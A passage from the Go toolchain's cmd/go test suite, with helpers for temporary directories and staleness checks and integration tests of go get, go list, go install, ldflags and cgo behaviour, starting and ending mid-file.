tg.t.Helper()
return tg.doGrepCount(match, &tg.stdout) + tg.doGrepCount(match, &tg.stderr)
}
// creatingTemp records that the test plans to create a temporary file
// or directory. If the file or directory exists already, it will be
// removed. When the test completes, the file or directory will be
// removed if it exists.
func (tg *testgoData) creatingTemp(path string) {
tg.t.Helper()
if filepath.IsAbs(path) && !strings.HasPrefix(path, tg.tempdir) {
tg.t.Fatalf("internal testsuite error: creatingTemp(%q) with absolute path not in temporary directory", path)
}
tg.must(robustio.RemoveAll(path))
tg.temps = append(tg.temps, path)
}
// makeTempdir makes a temporary directory for a run of testgo. If
// the temporary directory was already created, this does nothing.
func (tg *testgoData) makeTempdir() {
tg.t.Helper()
if tg.tempdir == "" {
var err error
tg.tempdir, err = os.MkdirTemp("", "gotest")
tg.must(err)
}
}
// tempFile adds a temporary file for a run of testgo.
func (tg *testgoData) tempFile(path, contents string) {
tg.t.Helper()
tg.makeTempdir()
tg.must(os.MkdirAll(filepath.Join(tg.tempdir, filepath.Dir(path)), 0755))
bytes := []byte(contents)
if strings.HasSuffix(path, ".go") {
formatted, err := format.Source(bytes)
if err == nil {
bytes = formatted
}
}
tg.must(os.WriteFile(filepath.Join(tg.tempdir, path), bytes, 0644))
}
// tempDir adds a temporary directory for a run of testgo.
func (tg *testgoData) tempDir(path string) {
tg.t.Helper()
tg.makeTempdir()
if err := os.MkdirAll(filepath.Join(tg.tempdir, path), 0755); err != nil && !os.IsExist(err) {
tg.t.Fatal(err)
}
}
// path returns the absolute pathname to file with the temporary
// directory.
func (tg *testgoData) path(name string) string {
tg.t.Helper()
if tg.tempdir == "" {
tg.t.Fatalf("internal testsuite error: path(%q) with no tempdir", name)
}
if name == "." {
return tg.tempdir
}
return filepath.Join(tg.tempdir, name)
}
// mustExist fails if path does not exist.
func (tg *testgoData) mustExist(path string) {
tg.t.Helper()
if _, err := os.Stat(path); err != nil {
if os.IsNotExist(err) {
tg.t.Fatalf("%s does not exist but should", path)
}
tg.t.Fatalf("%s stat failed: %v", path, err)
}
}
// mustNotExist fails if path exists.
func (tg *testgoData) mustNotExist(path string) {
tg.t.Helper()
if _, err := os.Stat(path); err == nil || !os.IsNotExist(err) {
tg.t.Fatalf("%s exists but should not (%v)", path, err)
}
}
// mustHaveContent succeeds if filePath is a path to a file,
// and that file is readable and not empty.
func (tg *testgoData) mustHaveContent(filePath string) {
tg.mustExist(filePath)
f, err := os.Stat(filePath)
if err != nil {
tg.t.Fatal(err)
}
if f.Size() == 0 {
tg.t.Fatalf("expected %s to have data, but is empty", filePath)
}
}
// wantExecutable fails with msg if path is not executable.
func (tg *testgoData) wantExecutable(path, msg string) {
tg.t.Helper()
if st, err := os.Stat(path); err != nil {
if !os.IsNotExist(err) {
tg.t.Log(err)
}
tg.t.Fatal(msg)
} else {
if runtime.GOOS != "windows" && st.Mode()&0111 == 0 {
tg.t.Fatalf("binary %s exists but is not executable", path)
}
}
}
// isStale reports whether pkg is stale, and why.
func (tg *testgoData) isStale(pkg string) (bool, string) {
tg.t.Helper()
tg.run("list", "-f", "{{.Stale}}:{{.StaleReason}}", pkg)
v := strings.TrimSpace(tg.getStdout())
f := strings.SplitN(v, ":", 2)
if len(f) == 2 {
switch f[0] {
case "true":
return true, f[1]
case "false":
return false, f[1]
}
}
tg.t.Fatalf("unexpected output checking staleness of package %v: %v", pkg, v)
panic("unreachable")
}
// wantStale fails with msg if pkg is not stale.
func (tg *testgoData) wantStale(pkg, reason, msg string) {
tg.t.Helper()
stale, why := tg.isStale(pkg)
if !stale {
tg.t.Fatal(msg)
}
// We always accept the reason as being "not installed but
// available in build cache", because when that is the case go
// list doesn't try to sort out the underlying reason why the
// package is not installed.
if reason == "" && why != "" || !strings.Contains(why, reason) && !strings.Contains(why, "not installed but available in build cache") {
tg.t.Errorf("wrong reason for Stale=true: %q, want %q", why, reason)
}
}
// wantNotStale fails with msg if pkg is stale.
func (tg *testgoData) wantNotStale(pkg, reason, msg string) {
tg.t.Helper()
stale, why := tg.isStale(pkg)
if stale {
tg.t.Fatal(msg)
}
if reason == "" && why != "" || !strings.Contains(why, reason) {
tg.t.Errorf("wrong reason for Stale=false: %q, want %q", why, reason)
}
}
// If -testwork is specified, the test prints the name of the temp directory
// and does not remove it when done, so that a programmer can
// poke at the test file tree afterward.
var testWork = flag.Bool("testwork", false, "")
// cleanup cleans up a test that runs testgo.
func (tg *testgoData) cleanup() {
tg.t.Helper()
if *testWork {
tg.t.Logf("TESTWORK=%s\n", tg.path("."))
return
}
for _, path := range tg.temps {
tg.check(removeAll(path))
}
if tg.tempdir != "" {
tg.check(removeAll(tg.tempdir))
}
}
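// removeAll removes dir and everything it contains, first making read-only
// entries (such as module cache directories) writable so they can be deleted.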
func removeAll(dir string) error {
// module cache has 0444 directories;
// make them writable in order to remove content.
filepath.WalkDir(dir, func(path string, info fs.DirEntry, err error) error {
// chmod not only directories, but also things that we couldn't even stat
// due to permission errors: they may also be unreadable directories.
if err != nil || info.IsDir() {
os.Chmod(path, 0777)
}
return nil
})
return robustio.RemoveAll(dir)
}
// failSSH puts an ssh executable in the PATH that always fails.
// This is to stub out uses of ssh by go get.
func (tg *testgoData) failSSH() {
tg.t.Helper()
wd, err := os.Getwd()
if err != nil {
tg.t.Fatal(err)
}
fail := filepath.Join(wd, "testdata/failssh")
tg.setenv("PATH", fmt.Sprintf("%v%c%v", fail, filepath.ListSeparator, os.Getenv("PATH")))
}
func TestNewReleaseRebuildsStalePackagesInGOPATH(t *testing.T) {
if testing.Short() {
t.Skip("skipping lengthy test in short mode")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
// Copy the runtime packages into a temporary GOROOT
// so that we can change files.
for _, copydir := range []string{
"src/runtime",
"src/internal/abi",
"src/internal/bytealg",
"src/internal/cpu",
"src/internal/goarch",
"src/internal/goexperiment",
"src/internal/goos",
"src/math/bits",
"src/unsafe",
filepath.Join("pkg", runtime.GOOS+"_"+runtime.GOARCH),
filepath.Join("pkg/tool", runtime.GOOS+"_"+runtime.GOARCH),
"pkg/include",
} {
srcdir := filepath.Join(testGOROOT, copydir)
tg.tempDir(filepath.Join("goroot", copydir))
err := filepath.WalkDir(srcdir,
func(path string, info fs.DirEntry, err error) error {
if err != nil {
return err
}
if info.IsDir() {
return nil
}
srcrel, err := filepath.Rel(srcdir, path)
if err != nil {
return err
}
dest := filepath.Join("goroot", copydir, srcrel)
data, err := os.ReadFile(path)
if err != nil {
return err
}
tg.tempFile(dest, string(data))
if strings.Contains(copydir, filepath.Join("pkg", "tool")) {
os.Chmod(tg.path(dest), 0777)
}
return nil
})
if err != nil {
t.Fatal(err)
}
}
tg.setenv("GOROOT", tg.path("goroot"))
addVar := func(name string, idx int) (restore func()) {
data, err := os.ReadFile(name)
if err != nil {
t.Fatal(err)
}
old := data
data = append(data, fmt.Sprintf("var DummyUnusedVar%d bool\n", idx)...)
if err := os.WriteFile(name, append(data, '\n'), 0666); err != nil {
t.Fatal(err)
}
tg.sleep()
return func() {
if err := os.WriteFile(name, old, 0666); err != nil {
t.Fatal(err)
}
}
}
// Every main package depends on the "runtime".
tg.tempFile("d1/src/p1/p1.go", `package main; func main(){}`)
tg.setenv("GOPATH", tg.path("d1"))
// Pass -i flag to rebuild everything outdated.
tg.run("install", "-i", "p1")
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale, incorrectly, before any changes")
// Changing mtime of runtime/internal/sys/sys.go
// should have no effect: only the content matters.
// In fact this should be true even outside a release branch.
sys := tg.path("goroot/src/runtime/internal/sys/sys.go")
tg.sleep()
restore := addVar(sys, 0)
restore()
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale, incorrectly, after updating mtime of runtime/internal/sys/sys.go")
// But changing content of any file should have an effect.
// Previously zversion.go was the only one that mattered;
// now they all matter, so keep using sys.go.
restore = addVar(sys, 1)
defer restore()
tg.wantStale("p1", "stale dependency: runtime/internal/sys", "./testgo list claims p1 is NOT stale, incorrectly, after changing sys.go")
restore()
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale, incorrectly, after changing back to old release")
addVar(sys, 2)
tg.wantStale("p1", "stale dependency: runtime", "./testgo list claims p1 is NOT stale, incorrectly, after changing sys.go again")
tg.run("install", "-i", "p1")
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale after building with new release")
// Restore to "old" release.
restore()
tg.wantStale("p1", "stale dependency: runtime/internal/sys", "./testgo list claims p1 is NOT stale, incorrectly, after restoring sys.go")
tg.run("install", "-i", "p1")
tg.wantNotStale("p1", "", "./testgo list claims p1 is stale after building with old release")
}
// cmd/go: custom import path checking should not apply to Go packages without import comment.
func TestIssue10952(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
const importPath = "github.com/zombiezen/go-get-issue-10952"
tg.run("get", "-d", "-u", importPath)
repoDir := tg.path("src/" + importPath)
tg.runGit(repoDir, "remote", "set-url", "origin", "https://"+importPath+".git")
tg.run("get", "-d", "-u", importPath)
}
func TestIssue16471(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
tg.must(os.MkdirAll(tg.path("src/rsc.io/go-get-issue-10952"), 0755))
tg.runGit(tg.path("src/rsc.io"), "clone", "https://github.com/zombiezen/go-get-issue-10952")
tg.runFail("get", "-u", "rsc.io/go-get-issue-10952")
tg.grepStderr("rsc.io/go-get-issue-10952 is a custom import path for https://github.com/rsc/go-get-issue-10952, but .* is checked out from https://github.com/zombiezen/go-get-issue-10952", "did not detect updated import path")
}
// Test git clone URL that uses SCP-like syntax and custom import path checking.
func TestIssue11457(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
const importPath = "rsc.io/go-get-issue-11457"
tg.run("get", "-d", "-u", importPath)
repoDir := tg.path("src/" + importPath)
tg.runGit(repoDir, "remote", "set-url", "origin", "[email protected]:rsc/go-get-issue-11457")
// At this time, custom import path checking compares remotes verbatim (rather than
// just the host and path, skipping scheme and user), so we expect go get -u to fail.
// However, the goal of this test is to verify that gitRemoteRepo correctly parsed
// the SCP-like syntax, and we expect it to appear in the error message.
tg.runFail("get", "-d", "-u", importPath)
want := " is checked out from ssh://[email protected]/rsc/go-get-issue-11457"
if !strings.HasSuffix(strings.TrimSpace(tg.getStderr()), want) {
t.Error("expected clone URL to appear in stderr")
}
}
func TestGetGitDefaultBranch(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
// This repo has two branches, master and another-branch.
// The another-branch is the default that you get from 'git clone'.
// The go get command variants should not override this.
const importPath = "github.com/rsc/go-get-default-branch"
tg.run("get", "-d", importPath)
repoDir := tg.path("src/" + importPath)
tg.runGit(repoDir, "branch", "--contains", "HEAD")
tg.grepStdout(`\* another-branch`, "not on correct default branch")
tg.run("get", "-d", "-u", importPath)
tg.runGit(repoDir, "branch", "--contains", "HEAD")
tg.grepStdout(`\* another-branch`, "not on correct default branch")
}
// Security issue. Don't disable. See golang.org/issue/22125.
func TestAccidentalGitCheckout(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
testenv.MustHaveExecPath(t, "svn")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("get", "-u", "vcs-test.golang.org/go/test1-svn-git")
tg.grepStderr("src[\\\\/]vcs-test.* uses git, but parent .*src[\\\\/]vcs-test.* uses svn", "get did not fail for right reason")
if _, err := os.Stat(tg.path("SrC")); err == nil {
// This case only triggers on a case-insensitive file system.
tg.runFail("get", "-u", "vcs-test.golang.org/go/test2-svn-git/test2main")
tg.grepStderr("src[\\\\/]vcs-test.* uses git, but parent .*src[\\\\/]vcs-test.* uses svn", "get did not fail for right reason")
}
}
func TestPackageMainTestCompilerFlags(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.path("."))
tg.tempFile("src/p1/p1.go", "package main\n")
tg.tempFile("src/p1/p1_test.go", "package main\nimport \"testing\"\nfunc Test(t *testing.T){}\n")
tg.run("test", "-c", "-n", "p1")
tg.grepBothNot(`([\\/]compile|gccgo).* (-p main|-fgo-pkgpath=main).*p1\.go`, "should not have run compile -p main p1.go")
tg.grepStderr(`([\\/]compile|gccgo).* (-p p1|-fgo-pkgpath=p1).*p1\.go`, "should have run compile -p p1 p1.go")
}
// Issue 4104.
func TestGoTestWithPackageListedMultipleTimes(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("test", "errors", "errors", "errors", "errors", "errors")
if strings.Contains(strings.TrimSpace(tg.getStdout()), "\n") {
t.Error("go test errors errors errors errors errors tested the same package multiple times")
}
}
func TestGoListHasAConsistentOrder(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("list", "std")
first := tg.getStdout()
tg.run("list", "std")
if first != tg.getStdout() {
t.Error("go list std ordering is inconsistent")
}
}
func TestGoListStdDoesNotIncludeCommands(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("list", "std")
tg.grepStdoutNot("cmd/", "go list std shows commands")
}
func TestGoListCmdOnlyShowsCommands(t *testing.T) {
skipIfGccgo(t, "gccgo does not have GOROOT")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("list", "cmd")
out := strings.TrimSpace(tg.getStdout())
for _, line := range strings.Split(out, "\n") {
if !strings.Contains(line, "cmd/") {
t.Error("go list cmd shows non-commands")
break
}
}
}
func TestGoListDeps(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src/p1/p2/p3/p4")
tg.setenv("GOPATH", tg.path("."))
tg.tempFile("src/p1/p.go", "package p1\nimport _ \"p1/p2\"\n")
tg.tempFile("src/p1/p2/p.go", "package p2\nimport _ \"p1/p2/p3\"\n")
tg.tempFile("src/p1/p2/p3/p.go", "package p3\nimport _ \"p1/p2/p3/p4\"\n")
tg.tempFile("src/p1/p2/p3/p4/p.go", "package p4\n")
tg.run("list", "-f", "{{.Deps}}", "p1")
tg.grepStdout("p1/p2/p3/p4", "Deps(p1) does not mention p4")
tg.run("list", "-deps", "p1")
tg.grepStdout("p1/p2/p3/p4", "-deps p1 does not mention p4")
if runtime.Compiler != "gccgo" {
// Check the list is in dependency order.
tg.run("list", "-deps", "math")
want := "internal/cpu\nunsafe\nmath/bits\nmath\n"
out := tg.stdout.String()
if !strings.Contains(out, "internal/cpu") {
// Some systems don't use internal/cpu.
want = "unsafe\nmath/bits\nmath\n"
}
if tg.stdout.String() != want {
t.Fatalf("list -deps math: wrong order\nhave %q\nwant %q", tg.stdout.String(), want)
}
}
}
func TestGoListTest(t *testing.T) {
skipIfGccgo(t, "gccgo does not have standard packages")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.tempdir)
tg.run("list", "-test", "-deps", "sort")
tg.grepStdout(`^sort.test$`, "missing test main")
tg.grepStdout(`^sort$`, "missing real sort")
tg.grepStdout(`^sort \[sort.test\]$`, "missing test copy of sort")
tg.grepStdout(`^testing \[sort.test\]$`, "missing test copy of testing")
tg.grepStdoutNot(`^testing$`, "unexpected real copy of testing")
tg.run("list", "-test", "sort")
tg.grepStdout(`^sort.test$`, "missing test main")
tg.grepStdout(`^sort$`, "missing real sort")
tg.grepStdout(`^sort \[sort.test\]$`, "unexpected test copy of sort")
tg.grepStdoutNot(`^testing \[sort.test\]$`, "unexpected test copy of testing")
tg.grepStdoutNot(`^testing$`, "unexpected real copy of testing")
tg.run("list", "-test", "cmd/dist", "cmd/doc")
tg.grepStdout(`^cmd/dist$`, "missing cmd/dist")
tg.grepStdout(`^cmd/doc$`, "missing cmd/doc")
tg.grepStdout(`^cmd/doc\.test$`, "missing cmd/doc test")
tg.grepStdoutNot(`^cmd/dist\.test$`, "unexpected cmd/dist test")
tg.grepStdoutNot(`^testing`, "unexpected testing")
tg.run("list", "-test", "runtime/cgo")
tg.grepStdout(`^runtime/cgo$`, "missing runtime/cgo")
tg.run("list", "-deps", "-f", "{{if .DepOnly}}{{.ImportPath}}{{end}}", "sort")
tg.grepStdout(`^internal/reflectlite$`, "missing internal/reflectlite")
tg.grepStdoutNot(`^sort`, "unexpected sort")
}
func TestGoListCompiledCgo(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.tempdir)
tg.run("list", "-f", `{{join .CgoFiles "\n"}}`, "net")
if tg.stdout.String() == "" {
t.Skip("net does not use cgo")
}
if strings.Contains(tg.stdout.String(), tg.tempdir) {
t.Fatalf(".CgoFiles unexpectedly mentioned cache %s", tg.tempdir)
}
tg.run("list", "-compiled", "-f", `{{.Dir}}{{"\n"}}{{join .CompiledGoFiles "\n"}}`, "net")
if !strings.Contains(tg.stdout.String(), tg.tempdir) {
t.Fatalf(".CompiledGoFiles with -compiled did not mention cache %s", tg.tempdir)
}
dir := ""
for _, file := range strings.Split(tg.stdout.String(), "\n") {
if file == "" {
continue
}
if dir == "" {
dir = file
continue
}
if !strings.Contains(file, "/") && !strings.Contains(file, `\`) {
file = filepath.Join(dir, file)
}
if _, err := os.Stat(file); err != nil {
t.Fatalf("cannot find .CompiledGoFiles result %s: %v", file, err)
}
}
}
func TestGoListExport(t *testing.T) {
skipIfGccgo(t, "gccgo does not have standard packages")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.tempdir)
tg.run("list", "-f", "{{.Export}}", "strings")
if tg.stdout.String() != "" {
t.Fatalf(".Export without -export unexpectedly set")
}
tg.run("list", "-export", "-f", "{{.Export}}", "strings")
file := strings.TrimSpace(tg.stdout.String())
if file == "" {
t.Fatalf(".Export with -export was empty")
}
if _, err := os.Stat(file); err != nil {
t.Fatalf("cannot find .Export result %s: %v", file, err)
}
tg.run("list", "-export", "-f", "{{.BuildID}}", "strings")
buildID := strings.TrimSpace(tg.stdout.String())
if buildID == "" {
t.Fatalf(".BuildID with -export was empty")
}
tg.run("tool", "buildid", file)
toolBuildID := strings.TrimSpace(tg.stdout.String())
if buildID != toolBuildID {
t.Fatalf(".BuildID with -export %q disagrees with 'go tool buildid' %q", buildID, toolBuildID)
}
}
// Issue 4096. Validate the output of unsuccessful go install foo/quxx.
func TestUnsuccessfulGoInstallShouldMentionMissingPackage(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(`cannot find package "foo/quxx" in any of`) != 1 {
t.Error(`go install foo/quxx expected error: .*cannot find package "foo/quxx" in any of`)
}
}
func TestGOROOTSearchFailureReporting(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(regexp.QuoteMeta(filepath.Join("foo", "quxx"))+` \(from \$GOROOT\)$`) != 1 {
t.Error(`go install foo/quxx expected error: .*foo/quxx (from $GOROOT)`)
}
}
func TestMultipleGOPATHEntriesReportedSeparately(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
sep := string(filepath.ListSeparator)
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata", "a")+sep+filepath.Join(tg.pwd(), "testdata", "b"))
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(`testdata[/\\].[/\\]src[/\\]foo[/\\]quxx`) != 2 {
t.Error(`go install foo/quxx expected error: .*testdata/a/src/foo/quxx (from $GOPATH)\n.*testdata/b/src/foo/quxx`)
}
}
// Test (from $GOPATH) annotation is reported for the first GOPATH entry,
func TestMentionGOPATHInFirstGOPATHEntry(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
sep := string(filepath.ListSeparator)
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata", "a")+sep+filepath.Join(tg.pwd(), "testdata", "b"))
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(regexp.QuoteMeta(filepath.Join("testdata", "a", "src", "foo", "quxx"))+` \(from \$GOPATH\)$`) != 1 {
t.Error(`go install foo/quxx expected error: .*testdata/a/src/foo/quxx (from $GOPATH)`)
}
}
// but not on the second.
func TestMentionGOPATHNotOnSecondEntry(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
sep := string(filepath.ListSeparator)
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata", "a")+sep+filepath.Join(tg.pwd(), "testdata", "b"))
tg.runFail("install", "foo/quxx")
if tg.grepCountBoth(regexp.QuoteMeta(filepath.Join("testdata", "b", "src", "foo", "quxx"))+`$`) != 1 {
t.Error(`go install foo/quxx expected error: .*testdata/b/src/foo/quxx`)
}
}
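// homeEnvName returns the name of the environment variable that holds the
// user's home directory on the current operating system.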
func homeEnvName() string {
switch runtime.GOOS {
case "windows":
return "USERPROFILE"
case "plan9":
return "home"
default:
return "HOME"
}
}
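// tempEnvName returns the name of the environment variable that holds the
// temporary directory on the current operating system.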
func tempEnvName() string {
switch runtime.GOOS {
case "windows":
return "TMP"
case "plan9":
return "TMPDIR" // actually plan 9 doesn't have one at all but this is fine
default:
return "TMPDIR"
}
}
func TestDefaultGOPATH(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("home/go")
tg.setenv(homeEnvName(), tg.path("home"))
tg.run("env", "GOPATH")
tg.grepStdout(regexp.QuoteMeta(tg.path("home/go")), "want GOPATH=$HOME/go")
tg.setenv("GOROOT", tg.path("home/go"))
tg.run("env", "GOPATH")
tg.grepStdoutNot(".", "want unset GOPATH because GOROOT=$HOME/go")
tg.setenv("GOROOT", tg.path("home/go")+"/")
tg.run("env", "GOPATH")
tg.grepStdoutNot(".", "want unset GOPATH because GOROOT=$HOME/go/")
}
func TestDefaultGOPATHGet(t *testing.T) {
testenv.MustHaveExternalNetwork(t)
testenv.MustHaveExecPath(t, "git")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("GOPATH", "")
tg.tempDir("home")
tg.setenv(homeEnvName(), tg.path("home"))
// warn for creating directory
tg.run("get", "-v", "github.com/golang/example/hello")
tg.grepStderr("created GOPATH="+regexp.QuoteMeta(tg.path("home/go"))+"; see 'go help gopath'", "did not create GOPATH")
// no warning if directory already exists
tg.must(robustio.RemoveAll(tg.path("home/go")))
tg.tempDir("home/go")
tg.run("get", "github.com/golang/example/hello")
tg.grepStderrNot(".", "expected no output on standard error")
// error if $HOME/go is a file
tg.must(robustio.RemoveAll(tg.path("home/go")))
tg.tempFile("home/go", "")
tg.runFail("get", "github.com/golang/example/hello")
tg.grepStderr(`mkdir .*[/\\]go: .*(not a directory|cannot find the path)`, "expected error because $HOME/go is a file")
}
func TestDefaultGOPATHPrintedSearchList(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("GOPATH", "")
tg.tempDir("home")
tg.setenv(homeEnvName(), tg.path("home"))
tg.runFail("install", "github.com/golang/example/hello")
tg.grepStderr(regexp.QuoteMeta(tg.path("home/go/src/github.com/golang/example/hello"))+`.*from \$GOPATH`, "expected default GOPATH")
}
func TestLdflagsArgumentsWithSpacesIssue3941(t *testing.T) {
skipIfGccgo(t, "gccgo does not support -ldflags -X")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("main.go", `package main
var extern string
func main() {
println(extern)
}`)
tg.run("run", "-ldflags", `-X "main.extern=hello world"`, tg.path("main.go"))
tg.grepStderr("^hello world", `ldflags -X "main.extern=hello world"' failed`)
}
func TestLdFlagsLongArgumentsIssue42295(t *testing.T) {
// Test that extremely long command line arguments that contain '\n' characters
// get encoded and passed correctly.
skipIfGccgo(t, "gccgo does not support -ldflags -X")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("main.go", `package main
var extern string
func main() {
print(extern)
}`)
testStr := "test test test test test \n\\ "
var buf bytes.Buffer
for buf.Len() < sys.ExecArgLengthLimit+1 {
buf.WriteString(testStr)
}
tg.run("run", "-buildinfo=false", "-ldflags", fmt.Sprintf(`-X "main.extern=%s"`, buf.String()), tg.path("main.go"))
if tg.stderr.String() != buf.String() {
t.Errorf("strings differ")
}
}
func TestGoTestDashCDashOControlsBinaryLocation(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.run("test", "-c", "-o", tg.path("myerrors.test"+exeSuffix), "errors")
tg.wantExecutable(tg.path("myerrors.test"+exeSuffix), "go test -c -o myerrors.test did not create myerrors.test")
}
func TestGoTestDashOWritesBinary(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.run("test", "-o", tg.path("myerrors.test"+exeSuffix), "errors")
tg.wantExecutable(tg.path("myerrors.test"+exeSuffix), "go test -o myerrors.test did not create myerrors.test")
}
func TestGoTestDashIDashOWritesBinary(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
// don't let test -i overwrite runtime
tg.wantNotStale("runtime", "", "must be non-stale before test -i")
tg.run("test", "-v", "-i", "-o", tg.path("myerrors.test"+exeSuffix), "errors")
tg.grepBothNot("PASS|FAIL", "test should not have run")
tg.wantExecutable(tg.path("myerrors.test"+exeSuffix), "go test -o myerrors.test did not create myerrors.test")
}
// Issue 4515.
func TestInstallWithTags(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("bin")
tg.tempFile("src/example/a/main.go", `package main
func main() {}`)
tg.tempFile("src/example/b/main.go", `// +build mytag
package main
func main() {}`)
tg.setenv("GOPATH", tg.path("."))
tg.run("install", "-tags", "mytag", "example/a", "example/b")
tg.wantExecutable(tg.path("bin/a"+exeSuffix), "go install example/a example/b did not install binaries")
tg.wantExecutable(tg.path("bin/b"+exeSuffix), "go install example/a example/b did not install binaries")
tg.must(os.Remove(tg.path("bin/a" + exeSuffix)))
tg.must(os.Remove(tg.path("bin/b" + exeSuffix)))
tg.run("install", "-tags", "mytag", "example/...")
tg.wantExecutable(tg.path("bin/a"+exeSuffix), "go install example/... did not install binaries")
tg.wantExecutable(tg.path("bin/b"+exeSuffix), "go install example/... did not install binaries")
tg.run("list", "-tags", "mytag", "example/b...")
if strings.TrimSpace(tg.getStdout()) != "example/b" {
t.Error("go list example/b did not find example/b")
}
}
// Issue 17451, 17662.
func TestSymlinkWarning(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.path("."))
tg.tempDir("src/example/xx")
tg.tempDir("yy/zz")
tg.tempFile("yy/zz/zz.go", "package zz\n")
if err := os.Symlink(tg.path("yy"), tg.path("src/example/xx/yy")); err != nil {
t.Skipf("symlink failed: %v", err)
}
tg.run("list", "example/xx/z...")
tg.grepStdoutNot(".", "list should not have matched anything")
tg.grepStderr("matched no packages", "list should have reported that pattern matched no packages")
tg.grepStderrNot("symlink", "list should not have reported symlink")
tg.run("list", "example/xx/...")
tg.grepStdoutNot(".", "list should not have matched anything")
tg.grepStderr("matched no packages", "list should have reported that pattern matched no packages")
tg.grepStderr("ignoring symlink", "list should have reported symlink")
}
func TestCgoShowsFullPathNames(t *testing.T) {
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
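// The source file below is deliberately malformed so that the build fails
// and the error output can be checked for the full directory path.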
tg.tempFile("src/x/y/dirname/foo.go", `
package foo
import "C"
func f() {`)
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "x/y/dirname")
tg.grepBoth("x/y/dirname", "error did not use full path")
}
func TestCgoHandlesWlORIGIN(t *testing.T) {
tooSlow(t)
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/origin/origin.go", `package origin
// #cgo !darwin LDFLAGS: -Wl,-rpath,$ORIGIN
// void f(void) {}
import "C"
func f() { C.f() }`)
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "origin")
}
func TestCgoPkgConfig(t *testing.T) {
tooSlow(t)
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("env", "PKG_CONFIG")
pkgConfig := strings.TrimSpace(tg.getStdout())
testenv.MustHaveExecPath(t, pkgConfig)
if out, err := exec.Command(pkgConfig, "--atleast-pkgconfig-version", "0.24").CombinedOutput(); err != nil {
t.Skipf("%s --atleast-pkgconfig-version 0.24: %v\n%s", pkgConfig, err, out)
}
// OpenBSD's pkg-config is strict about whitespace and only
// supports backslash-escaped whitespace. It does not support
// quotes, which the normal freedesktop.org pkg-config does
// support. See https://man.openbsd.org/pkg-config.1
tg.tempFile("foo.pc", `
Name: foo
